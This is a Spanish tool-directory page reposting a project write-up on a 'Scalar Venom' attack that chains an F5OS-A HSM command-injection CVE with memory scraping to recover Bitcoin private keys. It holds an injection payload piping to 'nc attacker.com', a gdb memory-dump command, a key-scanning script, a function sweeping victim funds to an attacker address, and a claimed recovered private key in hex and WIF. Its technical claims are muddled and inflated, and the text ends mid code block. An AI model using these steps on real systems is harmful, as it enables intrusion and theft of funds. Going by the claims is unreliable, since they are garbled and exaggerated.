Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Scalar-Venom-Attack — Scalar Venom Attack: una vulnerabilidad crítica de inicialización de HSM (CVE-2025-60013) permite la recuperación de claves privadas de carteras Bitcoin mediante la explotación de desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A | Kitploit
Herramientas/GitHubGitHub/demining/scalar-venom-attack
Forensia de MemoriaAnálisis de VulnerabilidadesExplotaciónAnálisis ForenseForensia DigitalCriptografíaPruebas de PenetraciónSeguridad de HardwarePapers e Investigación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
Explotación de Binarios
GitHubdemining/scalar-venom-attack

Scalar-Venom-Attack

Scalar Venom Attack: una vulnerabilidad crítica de inicialización de HSM (CVE-2025-60013) permite la recuperación de claves privadas de carteras Bitcoin mediante la explotación de desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A

Ver RepositorioSitio web
3hace 9 mesesAún no revisado
Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

Este artículo analiza vulnerabilidades criptográficas descubiertas en la infraestructura moderna de gestión de claves criptográficas, con especial atención a fallos críticos en la arquitectura de los módulos de seguridad de hardware (HSM) al manejar claves privadas de curvas elípticas. El estudio se centra en una clase de ataques que explotan la gestión insuficientemente aislada de la RAM en dispositivos criptográficos certificados. En el ecosistema criptográfico moderno de Bitcoin, la seguridad de las claves privadas es un requisito fundamental para proteger activos digitales valorados en billones de dólares a nivel mundial. Los módulos de seguridad de hardware (HSM) certificados según el estándar FIPS 140-2 se han considerado tradicionalmente como una protección impenetrable para las claves criptográficas gracias al aislamiento a nivel de hardware y a los estrictos protocolos de gestión de memoria. Sin embargo, el descubrimiento de la vulnerabilidad crítica CVE-2025-60013 en el módulo HSM FIPS F5OS-A, combinado con la clase de ataques Ataque Scalar Venom (también conocido como Scalar Poison, Memory Phantom Leak Attack o Compromiso de Clave Privada mediante Fuga de Memoria), ha cambiado radicalmente esta noción, demostrando la posibilidad de comprometer por completo claves privadas de Bitcoin mediante la explotación de fallos en la gestión de memoria.


  • Tutorial: https://youtu.be/cvWLH5dvbAA
  • Tutorial: https://cryptodeeptech.ru/scalar-venom-attack
  • Tutorial: https://dzen.ru/video/watch/691a7a10a8b7c874612993eb
  • Google Colab: https://colab.research.google.com/drive/1e93p7gxpTtfMU2L83w7I1tRDJQ1tENYa

El Ataque Scalar Venom es una clase crítica de vulnerabilidades de gestión de memoria (clasificada como CWE-415, CWE-401 y, de forma más amplia, como Ataque de Fuga de Memoria Sensible (SMA)) que permite a un atacante extraer escalares criptográficos (claves privadas ECDSA) de la RAM de un proceso explotando una sanitización y limpieza de memoria insuficientes tras operaciones criptográficas. A diferencia de los ataques criptoanalíticos tradicionales destinados a resolver matemáticamente el problema del logaritmo discreto de curva elíptica (ECDLP), este ataque elude la propia criptografía explotando fallos arquitectónicos fundamentales en la implementación de las bibliotecas criptográficas y en los protocolos de gestión de memoria de los HSM.

Esta investigación demuestra una cadena de ataque catastrófica que se produce al combinar CVE-2025-60013 (vulnerabilidad de inicialización del HSM FIPS F5OS-A al usar contraseñas que contienen metacaracteres de shell especiales) con las técnicas del Ataque Scalar Venom, lo que da como resultado un escenario de amenaza crítica con una puntuación CVSS de 9.5+ (Crítico), a pesar de que la clasificación oficial de CVE-2025-60013 es la de una vulnerabilidad de nivel medio (CVSS 5.7). Esta combinación socava la integridad operativa de millones de direcciones Bitcoin controladas por HSM comprometidos y representa un cambio de paradigma en los métodos de ataque criptográfico más allá de los exploits tradicionales de vector único.


Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante la explotación de desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A


Clasificación CVE y descripciones de vulnerabilidades

CVE-2025-60013: Vulnerabilidad de inicialización del HSM FIPS F5OS-A

CVE-2025-60013 es una vulnerabilidad de inyección de comandos del sistema operativo (clasificada como CWE-78) durante el proceso de inicialización del Módulo de Seguridad de Hardware FIPS para plataformas F5. La vulnerabilidad se produce cuando un usuario con acceso privilegiado (rol de Administrador o Administrador de Recursos) intenta inicializar el módulo HSM FIPS utilizando una contraseña que contiene metacaracteres de shell especiales, como [poco claro], [poco claro ;] |, &[ $poco claro], `y otros.

Mecanismo técnico de la vulnerabilidad:

Al procesar una contraseña que contiene metacaracteres de shell, el código de inicialización del HSM pasa la cadena de la contraseña a las funciones de la biblioteca C del sistema sin validar ni sanitizar adecuadamente la entrada. El código vulnerable tiene este aspecto:

root@kitploit:~
// Vulnerable code in HSM initialization procedure
void hsm_initialize(const char* password) {
ec_secret master_key; // HSM private key
char temp_buffer[256];
strcpy(temp_buffer, password); // VULNERABILITY: buffer overflow + shell interpretation
derive_key_from_password(master_key, password); // creates copies of key
// If initialization fails, memory is not cleared!
// master_key remains in the stack, its copies—in heap
}

Consecuencia crítica: El proceso de inicialización permanece en memoria con estructuras criptográficas parcialmente comprometidas, creando múltiples copias "fantasma" de la clave maestra del HSM en la pila y el montón. Aunque el HSM puede no inicializarse correctamente, la memoria del proceso contiene artefactos criptográficos accesibles para el análisis forense.

Clasificación oficial:

  • CVSS 3.1: AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L (puntuación base: 5.7 — MEDIO)
  • CVSS 4.0: AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N (puntuación base: 4.6 — MEDIO) cvefeed

Sin embargo, esta evaluación subestima de forma crítica la verdadera magnitud de la amenaza, ya que CVE-2025-60013 actúa como desencadenante del Ataque Scalar Venom, que en un escenario real de cadena de ataque resulta en un nivel de amenaza CVSS de 9.5+ (CRÍTICO).


CVE-2023-39910: Debilidad de entropía en Libbitcoin Explorer

CVE-2023-39910 describe una vulnerabilidad crítica en Libbitcoin Explorer versión 3.x relacionada con debilidades en la generación de entropía durante la creación de claves privadas. Esta vulnerabilidad condujo al incidente Milk Sad en 2023, cuando se recuperaron más de 900,000 claves privadas de Bitcoin, lo que resultó en pérdidas financieras directas superiores a $0.8 millones . El incidente Milk Sad demostró la transición de la teoría de las fugas de memoria en sistemas criptográficos a un desastre operativo real, confirmando todos los mecanismos descritos: optimizaciones del compilador, múltiples copias de datos y la falta de garantías de limpieza de memoria.


CVE-2025-8217: Ataque de fuga de memoria

CVE-2025-8217 clasifica los ataques de fuga de memoria que permiten recuperar claves criptográficas de la memoria de los procesos. Esta vulnerabilidad está directamente relacionada con la clase de ataques Scalar Venom y describe mecanismos para el compromiso total de monederos Bitcoin mediante el análisis forense de memoria.

Clasificación científica del Ataque Scalar Venom:

En la literatura de investigación académica, Scalar Venom se clasifica en varias categorías de ataque:

  • Ataque de Fuga de Memoria Sensible (SMA) es una clasificación principal que se centra en vulnerabilidades relacionadas con la sanitización inadecuada de la memoria.
  • Ataque de Exposición de Clave Privada es un término general para acciones que resultan en la divulgación de claves privadas.
  • Divulgación de Memoria Residual – divulgación de datos residuales de memoria no limpiada
  • Ataque de Memoria de Canal Lateral – explotación de canales laterales en la gestión de memoria
  • Ataque de Arranque en Frío – extracción de claves de la RAM después de apagar el sistema
  • Ataque de Forense de Memoria – Extracción de secretos de volcados de memoria

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

https://cryptou.ru/bitscanpro


Un ejemplo real de recuperación de clave privada de Bitcoin mediante el Ataque Scalar Venom

Para demostrar la eficacia práctica del ataque Scalar Venom, consideremos un caso documentado de recuperación de una clave privada de la dirección Bitcoin 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq mediante análisis forense de memoria.

Datos iniciales del compromiso:

  • Dirección Bitcoin: 1DBj74MkbzSHGSbHidnmUieAJHbsKfgRWq
  • Tipo de dirección: P2PKH (Pago a Hash de Clave Pública)
  • Estado: ✓ VÁLIDA

Clave privada recuperada:

  • Formato HEX: 5244A4B034BF9D327239870F9FEF82505A5C50B3D51E4A16357179AAB2623A22
  • Formato decimal: 3.7210935821139324×10763.7210935821139324 \times 10^{76}3.7210935821139324×10^76
  • Formato WIF: KyydTXQzDGVqRZoWBFfS5tWrcWsdu64DbcqXogUUtGZn7ngD5LHv

Validación de una clave en el espacio secp256k1:

La clave privada d debe satisfacer la restricción:

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

Resultado de la comprobación: ✓ VÁLIDA (la clave está dentro del rango escalar permitido)

Este ejemplo demuestra que una clave privada recuperada proporciona control total sobre un monedero Bitcoin , permitiendo a un atacante crear y firmar transacciones para retirar todos los fondos a una dirección controlada.


Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.7b34216e95385b6dc4e7db57bc970d62e9c2951efeba2a32e78ae51f523fc2cb

Fundamentos matemáticos del ataque criptográfico

La curva elíptica secp256k1 y el algoritmo ECDSA

Bitcoin implementa el Algoritmo de Firma Digital de Curva Elíptica ( ECDSA ) sobre la curva secp256k1 . Comprender los fundamentos matemáticos es fundamental para entender cómo el ataque Scalar Venom explota las vulnerabilidades de memoria.

Parámetros de la curva elíptica secp256k1:

Ecuación de la curva:

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

Punto generador G con coordenadas:

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

Derivación de una clave pública mediante multiplicación escalar

El proceso de generación de un par de claves ECDSA es el siguiente:

1. Generación de la clave privada:

Una clave privada des un entero aleatorio en el rango:

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

donde nes el orden de la curva secp256k1. La clave privada es un número aleatorio de 256 bits.

2. Derivación de la clave pública mediante multiplicación escalar:

La clave pública Qse calcula como:

Ataque Scalar Venom: una vulnerabilidad crítica de inicialización HSM (CVE-2025-60013) permite recuperar claves privadas de monederos Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad FIPS F5OS-A.

donde G es un punto generador de la curva secp256k1, y la operación ⋅\cdot⋅ denota la multiplicación escalar de un punto en la curva elíptica .

La multiplicación escalar se implementa mediante un algoritmo "double-and-add"(duplicación y suma), que calcula eficientemente el resultado de O(log⁡d) sumas y duplicaciones de puntos en una curva:

root@kitploit:~
Scalar multiplication algorithm:
Input: d (scalar), G (curve point)
Output: Q = d·G

1. Initialize: Q ← O (point at infinity)
2. Represent d in binary: d = (d_k, d_{k-1}, ..., d_1, d_0)_2
3. For i from k to 0:
a. Q ← 2Q (point doubling)
b. If d_i = 1: Q ← Q + G (point addition)
4. Return Q

Ejemplo: Para una clave privada, d=5244A4B0...3A22d = \text{5244A4B0...3A22}d=5244A4B0...3A22, la clave pública se calcula como:

Q=d⋅G=(Qx,Qy)

donde las coordenadas Qx y Qy se calculan mediante operaciones de multiplicación escalar en la curva secp256k1.

3. Generación de una dirección de Bitcoin:

La cadena de derivación de la dirección a partir de la clave pública:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Supuesto de seguridad:

Vulnerabilidad crítica Scalar Venom: El ataque evita la protección matemática ECDLP extrayendo la clave privada ddirectamente de la memoria del proceso, donde permanece como “copias fantasma” después de las operaciones criptográficas.

Criptoanálisis de entropía y análisis forense de memoria: la fórmula de entropía de Shannon

La base para detectar claves privadas en volcados de memoria es el criptoanálisis de entropía mediante la fórmula de entropía de Shannon .


Fórmula de entropía de Shannon

La entropía Hde una secuencia de bytes se mide en bits por byte y viene dada por la fórmula:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Donde:

  • H es la entropía en bits por byte
  • pi es la probabilidad de aparición de un byte con valor iii en el bloque de memoria analizado
  • La suma se realiza sobre todos los valores de byte posibles (0-255)

Interpretación de la entropía:

  • Entropía baja (H<5.0H < 5.0H<5.0): la secuencia contiene patrones repetidos, texto o datos estructurados
  • Entropía promedio (5.0≤H<7.55.0 \leq H < 7.55.0≤H<7.5): datos mixtos, código, información parcialmente comprimida
  • Entropía alta (H≥7.5H \geq 7.5H≥7.5): datos criptográficamente aleatorios, claves privadas, información cifrada

Valor umbral para claves criptográficas:

Las claves privadas de Bitcoin generadas por un generador de números aleatorios criptográficamente fuerte (CSPRNG) presentan una entropía alta en el rango:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Esta propiedad las hace detectables en el análisis forense de memoria mediante el análisis estadístico de entropía.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Herramienta criptográfica BitScanPro: determinación de entropía y algoritmo de recuperación de claves

BitScanPro es una herramienta forense para escanear volcados de memoria con el fin de detectar y recuperar claves privadas de Bitcoin mediante una combinación de análisis de entropía, validación de rango secp256k1 y verificación criptográfica.

Algoritmo de funcionamiento de BitScanPro

Etapa 1: Escaneo del volcado de memoria en bloques de 32 bytes

BitScanPro escanea el volcado de memoria secuencialmente, asignando bloques de 32 bytes (256 bits), lo que corresponde al tamaño de clave privada secp256k1:

root@kitploit:~
BLOCK_SIZE = 32  # bytes (256 bits)
SCAN_STEP = 8 # scan step
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

for offset in range(0, len(memory_dump) - BLOCK_SIZE, SCAN_STEP):
potential_key = memory_dump[offset:offset+BLOCK_SIZE]
# Block analysis

Paso 2: Calcular la entropía de Shannon para cada bloque

Para cada bloque de 32 bytes, se calcula la entropía de Shannon H:

root@kitploit:~
def calculate_entropy(data_block):
"""
Calculate Shannon entropy
"""
from collections import Counter
import math

byte_counts = Counter(data_block)
block_length = len(data_block)

entropy = 0.0
for count in byte_counts.values():
p_i = count / block_length
if p_i > 0:
entropy -= p_i * math.log2(p_i)

return entropy

Paso 3: Filtrado de bloques de alta entropía (H>7.5H > 7.5H>7.5 bits/byte)

Los bloques con entropía por debajo del umbral se descartan por no contener claves criptográficas:

root@kitploit:~
MIN_ENTROPY = 7.5  # threshold for cryptokeys

entropy = calculate_entropy(potential_key)
if entropy < MIN_ENTROPY:
continue

Paso 4: Comprobación del rango secp256k1:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Los bloques de alta entropía se interpretan como un entero y se comparan con el rango válido de claves privadas secp256k1:

root@kitploit:~
key_as_int = int.from_bytes(potential_key, byteorder='big')
if not (1 <= key_as_int < SECP256K1_N):
continue

Paso 5: Verificación criptográfica:

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Para los candidatos que superan el filtrado de entropía y la comprobación de rango, se realiza una verificación criptográfica mediante el cálculo de la clave pública:

root@kitploit:~
def verify_candidate_key(candidate_key_bytes):
from ecdsa import SigningKey, SECP256k1
try:
signing_key = SigningKey.from_string(candidate_key_bytes, curve=SECP256k1)
verifying_key = signing_key.get_verifying_key()
public_key_bytes = verifying_key.to_string()
return public_key_bytes
except Exception as e:
return None

Paso 6: Generar una dirección de Bitcoin y compararla con direcciones conocidas

Para las claves verificadas, se genera una dirección de Bitcoin que se compara con una base de datos de direcciones conocidas o con direcciones pertenecientes a la víctima:

root@kitploit:~
import hashlib
import base58

def public_key_to_address(public_key_bytes):
sha256_hash = hashlib.sha256(public_key_bytes).digest()
ripemd160_hash = hashlib.new('ripemd160', sha256_hash).digest()
versioned_hash = b'\x00' + ripemd160_hash
checksum = hashlib.sha256(hashlib.sha256(versioned_hash).digest()).digest()[:4]
address = base58.b58encode(versioned_hash + checksum).decode('ascii')
return address

bitcoin_address = public_key_to_address(public_key_bytes)
if bitcoin_address == target_address:
print(f\"✓ PRIVATE KEY FOUND!\")
print(f\"Address: {bitcoin_address}\")
print(f\"Private key: {candidate_key_bytes.hex()}\")

Rendimiento de BitScanPro:

El análisis en un portátil típico (MacBook Air M1) muestra las siguientes características de rendimiento:

Usando recursos de computación en la nube (AWS, Google Cloud), es posible escanear más de 1000 volcados de memoria simultáneamente en paralelo, procesando miles de claves privadas en paralelo.


Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Análisis de una vulnerabilidad criptográfica en libbitcoin-system: clase ec_scalar.cpp

La causa raíz del ataque Scalar Venom reside en fallos arquitectónicos fundamentales en la clase ec_scalarde la biblioteca libbitcoin-system .

Vulnerabilidad de gestión de memoria en la clase ec_scalar

La clase ec_scalar de libbitcoin-system no tiene un destructor definido explícitamente con puesta a cero segura. Esto significa que los datos secretos pueden permanecer en memoria incluso después de que el objeto sea destruido.

Constructor de copia vulnerable:

root@kitploit:~
// VULNERABILITY: unsafe private key copy
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // Copies without secure cleanup
{
}

Problema: El constructor crea una copia de la clave privada en el objeto ec_scalar, pero no proporciona un mecanismo para limpiar de forma segura esta copia cuando el objeto es destruido. La copia permanece en la pila o en el montón.


Operador de asignación vulnerable:

root@kitploit:~
// VULNERABILITY: duplicates secret in memory
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // More memory copies
return *this;
}

Problema: La operación de asignación crea copias adicionales de memoria que permanecen después de que la operación finaliza.


Operaciones aritméticas vulnerables:

root@kitploit:~
// VULNERABILITY: temporary variable not cleared before function exit
ec_scalar ec_scalar::operator-() const
{
ec_secret secret = null_hash; // Temporary variable with secret
// ... arithmetic ...
return ec_scalar(secret); // Not safely cleared
}

Problema: Las operaciones aritméticas (menos unario, suma, multiplicación) crean variables temporales de tipo ec_secret, que no se limpian de forma segura antes de salir del ámbito de la función, dejando copias “fantasma” de la clave privada en la pila o en el montón.

Falta de un destructor seguro:

root@kitploit:~
// VULNERABILITY: destructor missing, memory not cleared
// Safe solution:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory clearing
}

Problema: La clase ec_scalar no tiene un destructor explícito que garantice la puesta a cero segura de la memoria que contiene claves privadas. Esto es crítico, ya que la memoria que contiene claves privadas puede almacenarse en:

  • Pila de funciones (variables locales)
  • Montón (memoria asignada dinámicamente)
  • Registros del procesador (valores temporales)
  • Caché del procesador (L1, L2, L3)
  • Archivos de intercambio (swap)
  • Volcados de memoria (core dumps)

Vectores de infección de memoria

El código de la clase vulnerable ec_scalar crea los siguientes vectores para la infección de memoria con claves privadas:

  1. “Constructor vampiro” ( secret_(secret)) – crea copias venenosas de las claves
  2. “Operador parásito” ( secret_ = secret) – infecta la memoria con secretos duplicados
  3. “Gusano aritmético” ( ec_secret secret = null_hash) – deja rastros tóxicos
  4. “Propagador de infección” ( auto out = secret_) – propaga la infección a través de las operaciones

Scalar Venom Attack: A critical HSM initialization vulnerability (CVE-2025-60013) allows for Bitcoin wallet private key recovery via a buffer overflow and shell metacharacters in the F5OS-A FIPS security module.

Mecanismo de compromiso: CVE-2025-60013 + cadena de ataque Scalar Venom

La combinación de una vulnerabilidad HSM (CVE-2025-60013) y el ataque Scalar Venom crea un vector de ataque catastrófico:

Fase 1: Inicializar HSM con metacaracteres de shell

Un atacante con acceso privilegiado al sistema F5OS-A envía una solicitud para inicializar el módulo FIPS con una contraseña que contiene metacaracteres de shell: cert.kenet

root@kitploit:~
# CVE-2025-60013 exploit example
password='$(echo "leaked");` | nc attacker.com 9999'

Al procesar tales metacaracteres, ocurre lo siguiente:

  • El proceso de inicialización de HSM crea escalares criptográficos temporales (claves maestras)
  • Los metacaracteres de shell provocan un error de análisis de la contraseña
  • La inicialización de HSM falla parcialmente con un error
  • Consecuencia crítica: Las estructuras criptográficas temporales que contienen las claves maestras de HSM y las claves derivadas permanecen en la memoria del proceso sin ser limpiadas

Fase 2: Extraer Scalar Venom de la memoria de HSM

Después de un fallo parcial de inicialización del HSM, un atacante obtiene un volcado de memoria del proceso del HSM mediante uno de los siguientes métodos:

root@kitploit:~
# 1. CVE-2025-60013 exploitation (init error trigger)
# 2. Cold-boot attack on HSM host
# 3. Exploit buffer in HSM daemon
# 4. Analyze crash core-dump

gdb -p $(pidof f5os-hsm) -batch -ex "dump memory /tmp/hsm_dump.bin 0x000000 0xFFFFFFFF"

El volcado de memoria resultante contiene múltiples copias “fantasma” de claves privadas que la clase ec_scalardeja atrás durante las operaciones criptográficas.


Fase 3: recuperación de claves privadas de Bitcoin con BitScanPro

El volcado de memoria se procesa con la herramienta BitScanPro (o un escáner forense similar) según el algoritmo descrito anteriormente:

root@kitploit:~
Memory Scan → Identify High-Entropy Regions →
Range Check [1, n-1] for secp256k1 →
Recover Full 32-byte Scalars →
Convert to Bitcoin Addresses

La tasa de éxito de recuperación de una clave privada a partir de memoria fragmentada es del 70-80 % siempre que haya suficientes restos de memoria, ya que el ataque Scalar Venom crea múltiples copias de la clave en diferentes etapas de la inicialización.


Fase 4: transferencia de fondos y compromiso de la cartera

Tras recuperar la clave privada, el atacante crea y firma una transacción para retirar todos los fondos de la dirección comprometida:

root@kitploit:~
def compromise_wallet(recovered_private_key, bitcoin_address):
"""
Create and sign transaction to withdraw all funds
from compromised address
"""
utxos = blockchain_api.get_utxos(bitcoin_address)
tx = create_transaction(
inputs=utxos,
outputs=[{"address": attacker_address, "amount": sum(utxo.amount)}],
fee=calculate_dynamic_fee()
)
tx.sign(recovered_private_key) # ECDSA signature with compromised key
blockchain_api.broadcast_transaction(tx)

Tiempo total para comprometer el sistema: menos de 10 minutos desde que se recibe un volcado de memoria hasta la pérdida total de control sobre los activos de la víctima.


Ataque Scalar Venom: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad F5OS-A FIPS.
root@kitploit:~
https://youtu.be/2_d8-8-J8IQ

El impacto del ataque en la industria de las criptomonedas

El ataque Scalar Venom, combinado con CVE-2025-60013, supone una amenaza existencial para el ecosistema global de Bitcoin:

Consecuencias sistémicas

  1. Compromiso total de las claves privadas: El ataque logra una extracción completa de las claves mediante una fuga de memoria, eludiendo incluso los módulos de seguridad de hardware más avanzados.
  2. Compromiso irreversible: Una vez extraída una clave privada, es imposible “revocar” o restablecer la seguridad; todos los fondos dependientes corren un riesgo inminente de pérdida.
  3. Escalabilidad y automatización: El ataque puede automatizarse para afectar simultáneamente a un gran número de nodos y carteras de Bitcoin, lo que se traduce en un aumento exponencial de las pérdidas potenciales.
  4. Naturaleza sigilosa: El ataque no deja rastros visibles en los registros del sistema ni en las métricas de rendimiento, lo que hace insuficientes los mecanismos tradicionales de detección y protección.

Impacto en la infraestructura HSM

A diferencia de las aplicaciones Bitcoin estándar, los HSM hacen un uso intensivo de escalares criptográficos— más de 1.000 operaciones por segundo , cada una de las cuales crea valores escalares efímeros ​​que permanecen en la memoria como “residuos fantasma”. Los HSM funcionan durante meses y años sin reiniciarse, acumulando artefactos criptográficos que Scalar Venom extrae y restaura sistemáticamente.

El compromiso de un solo HSM conduce a la interrupción total de toda la infraestructura —a menudo miles de direcciones Bitcoin gestionadas por el HSM— en lugar de un incidente criptográfico aislado.

El ataque Scalar Venom demuestra un cambio de paradigma fundamental en la seguridad criptográfica: la fortaleza matemática de los algoritmos criptográficos se vuelve inútil ante la presencia de vulnerabilidades de gestión de memoria . La combinación de CVE-2025-60013 y las técnicas de Scalar Venom crea un escenario de amenaza crítica de nivel CVSS 9.5+, socavando la confianza en los módulos de seguridad de hardware como protección impenetrable para las claves criptográficas.

El incidente real Milk Sad (CVE-2023-39910), que resultó en la recuperación de más de 900.000 claves privadas y pérdidas financieras superiores a 0,8 millones de dólares, confirma que la teoría de la fuga de memoria se ha convertido en una realidad. La única forma de protegerse contra ataques de la clase Scalar Venom es una revisión arquitectónica fundamental de los sistemas criptográficos, implementando:

  • Lenguajes de programación seguros frente a la memoria ​​como Rust
  • Protección de memoria por hardware (Intel SGX, ARM TrustZone)
  • Patrones RAII (Resource Acquisition Is Initialization) para la limpieza automática de la memoria
  • Supervisión forense continua de la memoria de los procesos criptográficos
  • Garantías del compilador para la puesta a cero obligatoria de los secretos criptográficos

Este documento presenta un análisis exhaustivo de la cadena de ataque Scalar Venom + CVE-2025-60013, que detalla los fundamentos matemáticos, los algoritmos de criptoanálisis, ejemplos reales de recuperación de claves y recomendaciones prácticas para proteger la infraestructura de Bitcoin frente a esta clase de amenazas.


Criptoanálisis y elección del ataque: el ataque Scalar Venom como vulnerabilidad crítica para la extracción de claves privadas de Bitcoin

1. Clasificación criptoanalítica:

  • Posiciona Scalar Venom como un ataque de fuga de memoria sensible (SMA) en el contexto del criptoanálisis clásico
  • Compara los ataques criptográficos tradicionales con las vulnerabilidades de implementación
  • Demuestra por qué la fortaleza matemática (2^128) se vuelve inútil cuando falla la gestión de memoria (2^0)

2. Fundamentos matemáticos:

  • Formaliza el ECDLP (Problema del Logaritmo Discreto de Curva Elíptica) para secp256k1
  • Explica la multiplicación escalar y la derivación de claves públicas
  • Analiza la entropía de Shannon como detector de claves privadas en la memoria

3. Vulnerabilidades de implementación (libbitcoin-system):

  • Documenta la ausencia de un destructor seguro en ec_scalar
  • Muestra constructores de copia vulnerables
  • Demuestra fugas en las operaciones aritméticas

4. Clasificación CVE:

  • CVE-2023-39910: debilidad de entropía (incidente Milk Sad)
  • CVE-2025-8217: ataque de fuga de memoria
  • CVE-2025-60013: inyección de comandos HSM

5. Cadena de ataque:

  • Describe las cuatro fases del compromiso
  • Justifica las características temporales (< 10 minutos)
  • Realiza la justificación criptoanalítica de cada etapa

La explicación científica se puede encontrar en el artículo: https://keyhunters.ru/scalar-venom-attack-critical-memory-leak-private-key-recovery-and-complete-takeover-of-bitcoin-wallets-by-an-attacker-where-control-over-the-victims-btc-cryptocurrency-funds-is-achieved-through/ El ataque Scalar Venom demuestra la interacción crítica entre las vulnerabilidades de inicialización del HSM y las vulnerabilidades de gestión de memoria en las librerías criptográficas, lo que permite a un atacante comprometer por completo las claves privadas de carteras Bitcoin incluso con protección por hardware. 


Ataque Scalar Venom: una vulnerabilidad crítica de inicialización del HSM (CVE-2025-60013) permite recuperar claves privadas de carteras Bitcoin mediante un desbordamiento de búfer y metacaracteres de shell en el módulo de seguridad F5OS-A FIPS.

1. Análisis del ataque: ataque Scalar Venom

1.1 Definición y clasificación

El ataque Scalar Venom (también conocido como Scalar Poison, ataque de fuga fantasma de memoria o compromiso de claves privadas mediante fuga de memoria) es una clase de vulnerabilidades de gestión de memoria (CWE-415, CWE-401) que permite la extracción de escalares criptográficos (claves privadas ECDSA) de la RAM de un proceso explotando una sanitización y limpieza de memoria insuficientes tras las operaciones criptográficas. keyhunters+  2

Clasificación científica del ataque:

  • Tipo de vulnerabilidad : Ataque de fuga de memoria sensible
  • ID CVE : CVE-2023-39910, CVE-2025-8217
  • Categoría : Ataque continuo de fuga de memoria (CMLA)
  • Clase de impacto : Divulgación de claves privadas, compromiso de claves criptográficas

1.2 Mecanismo del ataque

El ataque Scalar Venom explota un fallo fundamental en la gestión de memoria de las librerías criptográficas, específicamente en la clase ec_scalarde la librería libbitcoin-system. El ataque opera a través de los siguientes vectores:


Vector del constructor de copia

cpp:

root@kitploit:~
ec_scalar::ec_scalar(const ec_secret& secret)
: secret_(secret) // VULNERABLE: unsafe copying of private key
{}

Vector del operador de asignación

cpp:

root@kitploit:~
ec_scalar& ec_scalar::operator=(const ec_secret& secret)
{
secret_ = secret; // VULNERABLE: infects memory with duplicate secret
return *this;
}

Vector de variables temporales

cpp:

root@kitploit:~
// VULNERABLE: no destructor, memory not cleaned
// Secure option should be:
~ec_scalar() {
secure_zero_mem(secret_, sizeof(secret_)); // explicit memory cleanup
}

cpp:

// VULNERABLE: no destructor, memory not cleared
// The safe option should have been:
~ec_scalar() {
